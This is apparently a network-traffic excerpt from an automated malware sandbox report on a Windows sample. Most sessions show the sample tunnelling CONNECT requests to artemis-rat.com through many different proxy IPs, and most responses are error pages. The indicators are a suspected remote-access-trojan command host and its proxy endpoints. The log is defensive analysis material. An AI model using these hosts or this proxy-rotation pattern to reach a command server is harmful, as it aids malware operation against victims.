                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.251415968 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1263192.168.2.45399431.223.184.143807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.096816063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.442183018 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1264192.168.2.453930180.250.159.4941537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.097194910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1265192.168.2.45405731.43.179.214807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.098040104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.252449989 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1266192.168.2.453353114.255.132.6031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.098440886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.467544079 CET1286INHTTP/1.1 503 Service Unavailable
                                              Server: squid/3.5.27
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3938
                                              X-Squid-Error: ERR_DNS_FAIL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {marg


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1267192.168.2.454071172.67.150.173807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.098592043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.252979994 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1268192.168.2.45397851.210.223.930007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.098661900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1269192.168.2.454080185.162.229.215807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.099263906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.253458977 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1270192.168.2.453905183.215.23.24290917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.099822044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.565351963 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>
                                              Mar 11, 2024 08:37:26.570755005 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1271192.168.2.453972125.122.26.24210807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.101933002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1272192.168.2.45395358.58.68.218108007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.104439974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1273192.168.2.454104104.20.24.214807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.104505062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.259485960 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1274192.168.2.453952222.223.103.23273027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.104609013 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:23.452241898 CET90INHTTP/1.1 200 OK
                                              Content-Type: application/json
                                              Connection: close
                                              Content-Length: 55


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1275192.168.2.454015162.159.242.45807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.105144978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.266216040 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1276192.168.2.4539958.217.95.4488997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.106786966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1277192.168.2.45402687.106.114.12460057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.108838081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1278192.168.2.45348951.161.33.206293607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.108952045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1279192.168.2.453990120.78.191.68807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.108953953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.442332983 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 